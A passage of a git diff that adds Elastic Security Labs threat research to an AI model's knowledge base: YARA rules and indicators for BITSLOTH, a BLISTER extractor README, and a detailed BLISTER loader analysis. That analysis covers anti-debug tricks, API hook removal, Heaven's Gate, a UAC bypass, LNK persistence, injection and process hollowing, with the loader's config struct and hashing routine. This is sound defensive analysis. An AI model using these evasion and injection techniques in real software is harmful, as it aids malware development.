+ - [Windows.Trojan.BITSloth](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_BITSloth.yar)
+ - [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)
+ - [Windows.Hacktool.Rubeus](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Rubeus.yar)
+ - [Windows.Hacktool.Certify](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Certify.yar)
+ - [Windows.Hacktool.RingQ](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_RingQ.yar)
+ - [Windows.Hacktool.GodPotato](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_GodPotato.yar)
+ - [Multi.Hacktool.Stowaway](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Stowaway.yar)
+
+#### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify BITSLOTH:
+
+```
+rule Windows_Trojan_BITSLOTH_05fc3a0a {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-07-16"
+        last_modified = "2024-07-18"
+        os = "Windows"
+        arch = "x86"
+        threat_name = "Windows.Trojan.BITSLOTH"
+  	 license = "Elastic License v2"
+
+    strings:
+        $str_1 = "/%s/index.htm?RspID=%d" wide fullword
+        $str_2 = "/%s/%08x.rpl" wide fullword
+        $str_3 = "/%s/wu.htm" wide fullword
+        $str_4 = "GET_DESKDOP" wide fullword
+        $str_5 = "http://updater.microsoft.com/index.aspx" wide fullword
+        $str_6 = "[U] update error..." wide fullword
+        $str_7 = "RMC_KERNEL ..." wide fullword
+        $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 }
+        $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 56 EB }
+    condition:
+        2 of them
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/bitsloth) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable | Type | Name | Reference |
+| ----- | ----- | ----- | ----- |
+| 4a4356faad620bf12ff53bcfac62e12eb67783bd22e66bf00a19a4c404bf45df | SHA-256 | ```s.dll``` | BITSLOTH |
+| dfb76bcf5a3e29225559ebbdae8bdd24f69262492eca2f99f7a9525628006d88 | SHA-256 | ```125.exe``` | BITSLOTH |
+| 4fb6dd11e723209d12b2d503a9fcf94d8fed6084aceca390ac0b7e7da1874f50 | SHA-256 | ```setup_wm.exe``` | BITSLOTH |
+| 0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507 | SHA-256 | ```1242.exe``` | BITSLOTH |
+| 0f9c0d9b77678d7360e492e00a7fa00af9b78331dc926b0747b07299b4e64afd | SHA-256 | ```setup_wm.exe``` | BITSLOTH (VMProtect) |
+| 216.238.121[.]132 | ipv4-addr | BITSLOTH C2 server |
+| 45.116.13[.]178 | ipv4-addr | BITSLOTH C2 server |
+| 15.235.132[.]67 | ipv4-addr | BITSLOTH C2 server |
+| http ://updater.microsoft.com/index.aspx | | | BITSLOTH file indicator |
+| updater.microsoft.com | | | BITSLOTH file indicator |
+
+## References
+The following were referenced throughout the above research:
+
+ - [https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master](https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master)
+ - [https://github.com/T4y1oR/RingQ](https://github.com/T4y1oR/RingQ)
+ - [https://github.com/EddieIvan01/iox](https://github.com/EddieIvan01/iox)
+ - [https://github.com/ph4ntonn/Stowaway/](https://github.com/ph4ntonn/Stowaway/)
+
+## About Elastic Security Labs
+
+Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.
+
+Follow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). 
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md
new file mode 100644
index 0000000000000..b205162f3ab5e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md
@@ -0,0 +1,65 @@
+---
+title: "BLISTER Configuration Extractor"
+slug: "blister-configuration-extractor"
+date: "2022-12-06"
+description: "Python script to extract the configuration and payload from BLISTER samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - blister
+  - ref7890
+---
+
+Python script to extract the configuration and payload from BLISTER samples.
+
+[Download blister-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9bce8a0e1a513bd5/62882db13b9b8554904a4baa/blister-config-extractor.tar.gz)
+
+## Getting Started
+
+This tool provides a Python module and command line tool that will extract configurations from the BLISTER malware loader and dump the results to screen.
+
+> For information on the BLISTER malware loader and campaign observations, check out our blog posts detailing this:
+>
+> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)
+> - [BLISTER Malware Analysis](https://www.elastic.co/security-labs/blister-loader)
+
+### Docker
+
+We can easily run the extractor with Docker, first we need to build the image:
+
+```
+docker build . -t blister-config-extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the docker container directory:
+
+```
+docker run -ti --rm -v \
+"$(pwd)/binaries":/binaries blister-config-extractor:latest -d /binaries/
+
+```
+
+We can either specify a single sample with **-f** option or a directory of samples with **-d**.
+
+![BLISTER configuration extrator output](/assets/images/blister-configuration-extractor/blister-configuration-extractor-image41.jpg)
+
+### Running it Locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+blister-config-extractor -h
+
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
+
+## References
+
+- Customised Rabbit cipher implementation based on [Rabbit-Cipher](https://github.com/Robin-Pwner/Rabbit-Cipher/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md
new file mode 100644
index 0000000000000..0177776226a23
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md
@@ -0,0 +1,471 @@
+---
+title: "BLISTER Loader"
+slug: "blister-loader"
+date: "2023-04-13"
+description: "The BLISTER loader continues to be actively used to load a variety of malware."
+author:
+  - slug: cyril-francois
+  - slug: daniel-stepanic
+  - slug: salim-bitam
+image: "blog-thumb-power-lines.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - blister
+  - malware
+---
+
+## Key Takeaways
+
+- BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode
+- In-depth analysis shows heavy reliance of Windows Native API’s, several injection capabilities, multiple techniques to evade detection, and counter static/dynamic analysis
+- Elastic Security is providing a configuration extractor that can be used to identify key elements of the malware and dump the embedded payload for further analysis
+- 40 days after the initial reporting on the BLISTER loader by Elastic Security, we observed a change in the binary to include additional architectures. This shows that this is an actively developed tool and the authors are watching defensive countermeasures
+
+> For information on the BLISTER malware loader and campaign observations, check out our blog post and configuration extractor detailing this:
+>
+> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)
+> - [BLISTER Configuration Extractor](https://www.elastic.co/security-labs/blister-configuration-extractor)
+
+## Overview
+
+The Elastic Security team has continually been monitoring the BLISTER loader since our initial [release](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) at the end of last year. This family continues to remain largely unnoticed, with low detection rates on new samples.
+
+![Example of BLISTER loader detection rates](/assets/images/blister-loader/blister-loader-image37.jpg)
+
+A distinguishing characteristic of BLISTER’s author is their method of tampering with legitimate DLLs to bypass static analysis. During the past year, Elastic Security has observed the following legitimate DLL’s patched by BLISTER malware:
+
+| Filename       | Description                                                        |
+| -------------- | ------------------------------------------------------------------ |
+| dxgi.dll       | DirectX Graphics Infrastructure                                    |
+| WIAAut.DLL     | WIA Automation Layer                                               |
+| PowerCPL.DLL   | Power Options Control Panel                                        |
+| WIMGAPI.DLL    | Windows Imaging Library                                            |
+| rdpencom.dll   | RDPSRAPI COM Objects                                               |
+| colorui.dll    | Microsoft Color Control Panel.                                     |
+| termmgr.dll    | Microsoft TAPI3 Terminal Manager                                   |
+| libcef.dll     | Chromium Embedded Framework (CEF) Dynamic Link Library             |
+| CEWMDM.DLL     | Windows CE WMDM Service Provider                                   |
+| intl.dll       | LGPLed libintl for Windows NT/2000/XP/Vista/7 and Windows 95/98/ME |
+| vidreszr.dll   | Windows Media Resizer                                              |
+| sppcommdlg.dll | Software Licensing UI API                                          |
+
+Due to the way malicious code is embedded in an otherwise benign application, BLISTER may be challenging for technologies that rely on some forms of machine learning. Combined with code-signing defense evasion, BLISTER appears designed with security technologies in mind.
+
+Our research shows that BLISTER is actively developed and has been [linked](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish) in public reporting to [LockBit](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) ransomware and the [SocGholish](https://redcanary.com/threat-detection-report/threats/socgholish/) framework; in addition, Elastic has also observed BLISTER in relation to the following families: [Amadey](https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey), [BitRAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat), [Clipbanker](https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker), [Cobalt Strike](https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike), [Remcos](https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos), and [Raccoon](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon) along with others.
+
+In this post, we will explain how BLISTER continues to operate clandestinely, highlight the loader’s core capabilities (injection options, obfuscation, and anti-analysis tricks) as well as provide a configuration extractor that can be used to dump BLISTER embedded payloads.
+
+Consider the following [sample](https://www.virustotal.com/gui/file/afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2) representative of BLISTER for purposes of this analysis. This sample was also used to develop the initial BLISTER family YARA signature, the configuration extraction script, and evaluate tools against against unknown x32 and x64 BLISTER samples.
+
+## Execution Flow
+
+The execution flow consists of the following phases:
+
+- Deciphering the second stage
+- Retrieving configuration and packed payload
+- Payload unpacking
+- Persistence mechanisms
+- Payload injection
+
+### Launch / Entry Point
+
+During the first stage of the execution flow, BLISTER is embedded in a legitimate version of the [colorui.dll](https://www.virustotal.com/gui/file/1068e40851b243a420cb203993a020d0ba198e1ec6c4d95f0953f81e13046973/details) library. The threat actor, with a previously achieved foothold, uses the Windows built-in rundll32.exe utility to load BLISTER by calling the export function **LaunchColorCpl** :
+
+```
+Rundll32 execution arguments
+
+rundll32.exe "BLISTER.dll,LaunchColorCpl"
+```
+
+The image below demonstrates how BLISTER’s DLL is modified, noting that the export start is patched with a function call (line 17) to the malware entrypoint.
+
+![Export of Patched BLISTER DLL](/assets/images/blister-loader/blister-loader-image13.jpg)
+
+If we compare one of these malicious loaders to the original DLL they masquerade as, we can see where the patch was made, the function no longer exists:
+
+![Export of Original DLL Used by BLISTER](/assets/images/blister-loader/blister-loader-image11.jpg)
+
+### Deciphering Second Stage
+
+BLISTER’s second stage is ciphered in its [resource section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-rsrc-section) (.rsrc).
+
+The deciphering routine begins with a loop based sleep to evade detection:
+
+![Initial Sleep Mechanism](/assets/images/blister-loader/blister-loader-image35.jpg)
+
+BLISTER then enumerates and hashes each export of ntdll, comparing export names against loaded module names; searching specifically for the **NtProtectVirtualMemory** API:
+
+![API Hash](/assets/images/blister-loader/blister-loader-image40.jpg)
+
+Finally, it looks for a memory region of 100,832 bytes by searching for a specific memory pattern, beginning its search at the return address and leading us in the .rsrc section. When found, BLISTER performs an eXclusive OR (XOR) operation on the memory region with a four-byte key, sets it’s page protection to PAGE_EXECUTE_READ with a call to NtProtectVirtualMemory, and call its second stage entry point with the deciphering key as parameter:
+
+![Memory Tag & Memory Region Setup](/assets/images/blister-loader/blister-loader-image49.jpg)
+
+### Obfuscation
+
+BLISTER’s second-stage involves obfuscating functions, scrambling their control flow by splitting their basic blocks with unconditional jumps and randomizing basic blocks’ locations. An example of which appears below.
+
+![Function’s Control Flow Scrambling](/assets/images/blister-loader/blister-loader-image6.jpg)
+
+BLISTER inserts junk code into basic blocks as yet another form of defense evasion, as seen below.
+
+![Junk Code Insertion](/assets/images/blister-loader/blister-loader-image30.jpg)
+
+### Retrieving Configuration and Packed Payload
+
+BLISTER uses the previous stage’s four-byte key to locate and decipher its configuration.
+
+The routine begins by searching its memory, beginning at return address, for its four-byte key XORed with a hardcoded value as memory pattern:
+
+![Memory pattern search loop](/assets/images/blister-loader/blister-loader-image24.jpg)
+
+When located, the 0x644 byte configuration is copied and XOR-decrypted with the same four-byte key:
+
+![Config decryption](/assets/images/blister-loader/blister-loader-image45.jpg)
+
+Finally, it returns a pointer to the beginning of the packed PE, which is after the 0x644 byte blob:
+
+![Pointer return to packed PE](/assets/images/blister-loader/blister-loader-image58.jpg)
+
+See the [configuration structure](https://www.elastic.co/security-labs/blister-loader#configuration-structure) in the appendix.
+
+### Time Based Anti Debug
+
+After loading the configuration, and depending if the **kEnableSleepBasedAntiDebug** flag (0x800) is set, BLISTER calls its time-based anti-debug function:
+
+![Check configuration for Sleep function](/assets/images/blister-loader/blister-loader-image60.jpg)
+
+This function starts by creating a thread with the Sleep Windows function as a starting address and 10 minutes as the argument:
+
+![Sleep function (600000 ms / 10 minutes)](/assets/images/blister-loader/blister-loader-image26.jpg)
+
+The main thread will sleep using **NtDelayExecution** until the sleep thread has exited:
+
+![NtDelayExecution used with Sleep function](/assets/images/blister-loader/blister-loader-image8.jpg)
+
+Finally the function returns 0 when the sleep thread has run at least for 9 1/2 minutes:
+
+![Condition to end sleep thread](/assets/images/blister-loader/blister-loader-image57.jpg)
+
+If not, the function will return 1 and the process will be terminated:
+
+![Process termination on sleep function if error](/assets/images/blister-loader/blister-loader-image16.jpg)
+
+### Windows API
+
+#### Blister’s GetModuleHandle
+
+BLISTER implements its own **GetModuleHandle** to evade detection, the function takes the library name hash as a parameter, iterates over the process [PEB LDR](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data)’s modules and checks the hashed module’s name against the one passed in the parameter:
+
+![Function used to verify module names](/assets/images/blister-loader/blister-loader-image18.jpg)
+
+#### Blister’s GetProcAddress
+
+BLISTER’s **GetProcAddress** takes the target DLL and the export hash as a parameter, it also takes a flag that tells the function that the library is 64 bits.
+
+The DLL can be loaded or mapped then the function iterates over the DLL’s export function names and compares their hashes with the ones passed in the parameter:
+
+![BLISTER’s GetProcAddress hash checking dll’s exports](/assets/images/blister-loader/blister-loader-image3.jpg)
+
+If the export is found, and its virtual address isn’t null, it is returned:
+
+![Return export virtual address](/assets/images/blister-loader/blister-loader-image48.jpg)
+
+Else the DLL is **LdrLoaded** and BLISTER’s **GetProcAddress** is called again with the newly loaded dll:
+
+![LdrLoad the DLL and call GetProcAddress again](/assets/images/blister-loader/blister-loader-image19.jpg)
+
+#### Library Manual Mapping
+
+BLISTER manually maps a library using **NtCreateFile** in order to open a handle on the DLL file:
+
+![NtCreateFile used within mapping function](/assets/images/blister-loader/blister-loader-image56.jpg)
+
+Next it creates a section with the handle by calling **NtCreateSection** with the **SEC_IMAGE** attribute which tells Windows to loads the binary as a PE:
+
+![NtCreateSection used within mapping function](/assets/images/blister-loader/blister-loader-image31.jpg)
+
+_NtCreateSection used within mapping function_
+
+Finally it maps the section with **NtMapViewOfSection** :
+
+![NtMapViewofSection used within mapping function](/assets/images/blister-loader/blister-loader-image36.jpg)
+
+#### x32/x64 Ntdll Mapping
+
+Following the call to its anti-debug function, BLISTER manually maps 32 bit and 64 bit versions of NTDLL.
+
+It starts by mapping the x32 version:
+
+![32 bit NTDLL mapping](/assets/images/blister-loader/blister-loader-image43.jpg)
+
+Then it disables [SysWOW64 redirection](https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector):
+
+![SysWOW64 disabled](/assets/images/blister-loader/blister-loader-image17.jpg)
+
+And then maps the 64 bit version:
+
+![64 bit NTDLL mapping](/assets/images/blister-loader/blister-loader-image50.jpg)
+
+Then if available, the mapped libraries will be used with the **GetProcAddress** function, i.e:
+
+![Mapped libraries using GetProcAddress](/assets/images/blister-loader/blister-loader-image7.jpg)
+
+#### LdrLoading Windows Libraries and Removing Hooks
+
+After mapping 32 and 64 bit **NTDLL** versions BLISTER will **LdrLoad** several Windows libraries and remove potential hooks:
+
+![Function used to load Windows libraries and remove hooks](/assets/images/blister-loader/blister-loader-image5.jpg)
+
+First, it tries to convert the hash to the library name by comparing the hash against a fixed list of known hashes:
+
+![Hash comparison](/assets/images/blister-loader/blister-loader-image22.jpg)
+
+If the hash is found BLISTER uses the **LdrLoad** to load the library:
+
+![Leveraging LdrLoad to load DLL](/assets/images/blister-loader/blister-loader-image53.jpg)
+
+Then BLISTER searches for the corresponding module in its own process:
+
+![Searching for module in own process](/assets/images/blister-loader/blister-loader-image15.jpg)
+
+And maps a fresh copy of the library with the module’s **FullDllName** :
+
+![Retrieving Module’s FullDllName](/assets/images/blister-loader/blister-loader-image10.jpg)
+
+![Manual Mapping function](/assets/images/blister-loader/blister-loader-image55.jpg)
+
+BLISTER then applies the relocation to the mapped library with the loaded one as the base address for the relocation calculation:
+
+![Performing relocation](/assets/images/blister-loader/blister-loader-image59.jpg)
+
+Next BLISTER iterates over each section of the loaded library to see if the section is executable:
+
+![Checking executable sections](/assets/images/blister-loader/blister-loader-image42.jpg)
+
+If the section is executable, it is replaced with the mapped one, thus removing any hooks:
+
+![Section replacement](/assets/images/blister-loader/blister-loader-image47.jpg)
+
+#### x64 API Call
+
+BLISTER can call 64-bit library functions through the use of special 64-bit function wrapper:
+
+![BLISTER utilizing 64-bit function library caller](/assets/images/blister-loader/blister-loader-image29.jpg)
+
+![64-bit function library caller](/assets/images/blister-loader/blister-loader-image54.jpg)
+
+To make this call BLISTER switches between 32-bit to 64-bit code using the old Heaven’s Gate [technique](https://blog.talosintelligence.com/2019/07/rats-and-stealers-rush-through-heavens.html):
+
+![Observed Heaven’s Gate byte sequences](/assets/images/blister-loader/blister-loader-image51.jpg)
+
+![Heaven’s Gate - Transition to 64 bit mode](/assets/images/blister-loader/blister-loader-image20.jpg)
+
+![Heaven’s Gate - Transition to 32 bit mode](/assets/images/blister-loader/blister-loader-image21.jpg)
+
+## Unpacking Payload
+
+During the unpacking process of the payload, the malware starts by allocating memory using **NtAllocateVirtualMemory** and passing in configuration information. A memcpy function is used to store a copy of encrypted/compressed payload in a buffer for next stage (decryption).
+
+![Unpacking BLISTER payload](/assets/images/blister-loader/blister-loader-image2.jpg)
+
+### Deciphering
+
+BLISTER leverages the Rabbit stream [cipher](<https://en.wikipedia.org/wiki/Rabbit_(cipher)>), passing in the previously allocated buffer containing the encrypted payload, the compressed data size along with the 16-byte deciphering key and 8-byte IV.
+
+![Decipher function using the Rabbit cipher](/assets/images/blister-loader/blister-loader-image1.jpg)
+
+![Observed Rabbit Cipher Key and IV inside memory](/assets/images/blister-loader/blister-loader-image23.jpg)
+
+### Decompression
+
+After the decryption stage, the payload is then decompressed using **RtlDecompressBuffer** with the LZNT1 compression format.
+
+![Decompression function using LZNT1](/assets/images/blister-loader/blister-loader-image9.jpg)
+
+## Persistence Mechanism
+
+To achieve persistence, BLISTER leverages Windows shortcuts by creating an LNK file inside the Windows startup folder. It creates a new directory using the **CreateDirectoryW** function with a unique hardcoded string found in the configuration file such as: C:\ProgramData`UNIQUE STRING\\>`
+
+BLISTER then copies C:\System32\rundll32.exe and itself to the newly created directory and renames the files to UNIQUE STRING\\>.exe and UNIQUE STRING\\>.dll, respectively.
+
+BLISTER uses the **CopyModuleIntoFolder** function and the **IFileOperation** Windows **COM** interface for [bypassing UAC](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies) when copying and renaming the files:
+
+![BLISTER function used to copy files](/assets/images/blister-loader/blister-loader-image46.jpg)
+
+The malware creates an LNK file using **IShellLinkW COM** interface and stores it in `C:\Users\<username>\AppData\Roaming\Microsft\Windows\Start Menu\Startup as UNIQUE STRING\\>.lnk`
+
+![Mapping shortcut to BLISTER with arguments](/assets/images/blister-loader/blister-loader-image25.jpg)
+
+The LNK file is set to run the export function **LaunchColorCpl** of the newly copied malware with the renamed instance of rundll32. C:\ProgramData\UNIQUE STRING\\>\UNIQUE STRING\\>.exe C:\ProgramData\UNIQUE STRING\\>\UNIQUE STRING\\>.dll,LaunchColorCpl
+
+## Injecting Payload
+
+BLISTER implements 3 different injection techniques to execute the payload according to the configuration flag:
+
+![BLISTER injection techniques by config flag](/assets/images/blister-loader/blister-loader-image27.jpg)
+
+### Shellcode Execution
+
+After decrypting the shellcode, BLISTER is able to inject it to a newly allocated read write memory region with **NtAllocateVirtualMemory** API, it then copies the shellcode to it and it sets the memory region to read write execute with **NtProtectVirtualMemory** and then executes it.
+
+![Execute shellcode function](/assets/images/blister-loader/blister-loader-image28.jpg)
+
+### Own Process Injection
+
+BLISTER can execute DLL or Executable payloads reflectively in its memory space. It first creates a section with **NtCreateSection** API.
+
+![RunPE function](/assets/images/blister-loader/blister-loader-image39.jpg)
+
+BLISTER then tries to map a view on the created section at the payload’s preferred base address. In case the preferred address is not available and the payload is an executable it will simply map a view on the created section at a random address and then do relocation.
+
+![Check for conflicting addresses](/assets/images/blister-loader/blister-loader-image34.jpg)
+
+Conversly, if the payload is a DLL, it will first unmap the memory region of the current process image and then it will map a view on the created section with the payload’s preferred address.
+
+![DLL unmapping](/assets/images/blister-loader/blister-loader-image33.jpg)
+
+BLISTER then calls a function to copy the PE headers and the sections.
+
+![Copying over PE/sections](/assets/images/blister-loader/blister-loader-image12.jpg)
+
+Finally, BLISTER executes the loaded payload in memory starting from its entry point if the payload is an executable. In case the payload is a DLL, it will find its export function according to the hash in the config file and execute it.
+
+### Process Hollowing
+
+BLISTER is able to perform [process hollowing](https://attack.mitre.org/techniques/T1055/012/) in a remote process:
+
+First, there is an initial check for a specific module hash value (0x12453653), if met, BLISTER performs process hollowing against the Internet Explorer executable.
+
+![Internet Explorer option for process hollowing](/assets/images/blister-loader/blister-loader-image32.jpg)
+
+If not, the malware performs remote process hollowing with **Werfault.exe**. BLISTER follows standard techniques used for process hollowing.
+
+![Process hollowing function](/assets/images/blister-loader/blister-loader-image44.jpg)
+
+There is one path within this function: if certain criteria are met matching Windows OS versions and build numbers the hollowing technique is performed by dropping a temporary file on disk within the **AppData** folder titled **Bg.Agent.ETW** with an explicit extension.
+
+![Compatibility Condition check](/assets/images/blister-loader/blister-loader-image52.jpg)
+
+![Compatibility Condition function](/assets/images/blister-loader/blister-loader-image14.jpg)
+
+![Temporary file used to store payload](/assets/images/blister-loader/blister-loader-image4.jpg)
+
+The malware uses this file to read and write malicious DLL to this file. Werfault.exe is started by BLISTER and then the contents of this temporary DLL are loaded into memory into the Werfault process and the file is shortly deleted after.
+
+![Procmon output of compatibility function](/assets/images/blister-loader/blister-loader-image38.jpg)
+
+## Configuration Extractor
+
+Automating the configuration and payload extraction from BLISTER is a key aspect when it comes to threat hunting as it gives visibility of the campaign and the malware deployed by the threat actors which enable us to discover new unknown samples and Cobalt Strike instances in a timely manner.
+
+Our extractor uses a [Rabbit stream cipher implementation](https://github.com/Robin-Pwner/Rabbit-Cipher) and takes either a directory of samples with **-d** option or **-f** for a single sample,
+
+![Config extractor output](/assets/images/blister-loader/blister-loader-image41.jpg)
+
+To enable the community to further defend themselves against existing and new variants of the BLISTER loader, we are making the configuration extractor open source under the Apache 2 License. The configuration extractor documentation and binary download can be accessed [here](https://www.elastic.co/security-labs/blister-configuration-extractor).
+
+## Conclusion
+
+BLISTER continues to be a formidable threat, punching above its own weight class, distributing popular malware families and implants leading to major compromises. Elastic Security has been tracking BLISTER for months and we see no signs of this family slowing down.
+
+From reversing BLISTER, our team was able to identify key functionality such as different injection methods, multiple techniques for defense evasion using anti-debug/anti-analysis features and heavy reliance on Windows Native API’s. We also are releasing a configuration extractor that can statically retrieve actionable information from BLISTER samples as well as dump out the embedded payloads.
+
+## Appendix
+
+### Configuration Structure
+
+```
+BLISTER configuration structure
+
+struct Config {
+  uint16_t flag;
+  uint32_t payload_export_hash;
+  wchar_t w_payload_filename_and_cmdline[783];
+  size_t compressed_data_size;
+  size_t uncompressed_data_size;
+  uint8_t pe_deciphering_key[16];
+  uint8_t pe_deciphering_iv[8];
+};
+
+```
+
+### Configuration’s Flags
+
+```
+BLISTER configuration files
+
+enum Config::Flags {
+  kDoPersistance = 0x1,
+  kOwnProcessReflectiveInjectionMethod = 0x2,
+  kOwnProcessHollowingMethod = 0x8,
+  kRemoteProcessHollowingMethod = 0x10,
+  kExecutePayloadExport = 0x20,
+  kExecuteShellcodeMethod = 0x40,
+  kInjectWithCmdLine = 0x80,
+  kSleepAfterInjection = 0x100,
+  kEnableSleepBasedAntiDebug = 0x800,
+};
+```
+
+### Hashing Algorithm
+
+```
+BLISTER hashing algorithm
+
+uint32_t HashLibraryName(wchar_t *name) {
+  uint32_t name {0};
+  while (*name) {
+ hash = ((hash >> 23) | (hash  << 9)) + *name++;
+  }
+  return hash ;
+}
+```
+
+### Indicators
+
+| Indicator                                                        | Type   | Note        |
+| ---------------------------------------------------------------- | ------ | ----------- |
+| afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2 | SHA256 | BLISTER DLL |
+
+## YARA Rule
+
+This updated YARA rule has shown a 13% improvement in detection rates.
+
+```
+BLISTER YARA rule
+
+rule Windows_Trojan_BLISTER {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-04-29"
+        last_modified = "2022-04-29"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BLISTER"
+        threat_name = "Windows.Trojan.BLISTER"
+        description = "Detects BLISTER loader."
+        reference_sample = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+
+    strings:
+        $a1 = { 8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7 }
+        $a2 = { 75 F7 39 4D FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75 }
+        $a3 = { 78 03 C3 8B 48 20 8B 50 1C 03 CB 8B 78 24 03 D3 8B 40 18 03 FB 89 4D F8 89 55 E0 89 45 E4 85 C0 74 3E 8B 09 8B D6 03 CB 8A 01 84 C0 74 17 C1 C2 09 0F BE C0 03 D0 41 8A 01 84 C0 75 F1 81 FA B2 17 EB 41 74 27 8B 4D F8 83 C7 02 8B 45 F4 83 C1 04 40 89 4D F8 89 45 F4 0F B7 C0 3B 45 E4 72 C2 8B FE 8B 45 04 B9 }
+        $b1 = { 65 48 8B 04 25 60 00 00 00 44 0F B7 DB 48 8B 48 ?? 48 8B 41 ?? C7 45 48 ?? ?? ?? ?? 4C 8B 40 ?? 49 63 40 ?? }
+        $b2 = { B9 FF FF FF 7F 89 5D 40 8B C1 44 8D 63 ?? F0 44 01 65 40 49 2B C4 75 ?? 39 4D 40 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 60 00 00 00 44 0F B7 DB }
+    condition:
+        any of them
+}
+```
+
+## References
+
+- [https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign)
+- [https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish)
+- [https://redcanary.com/threat-detection-report/threats/socgholish/](https://redcanary.com/threat-detection-report/threats/socgholish/)
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte5a55b99e66b4794/628e88d91cd65960bcff2862/blister-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md
new file mode 100644
index 0000000000000..c548827c211f6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md
@@ -0,0 +1,96 @@
+---
+title: "BPFDoor Configuration Extractor"
+slug: "bpfdoor-configuration-extractor"
+date: "2022-12-06"
+description: "Configuration extractor to dump out hardcoded passwords with BPFDoor."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
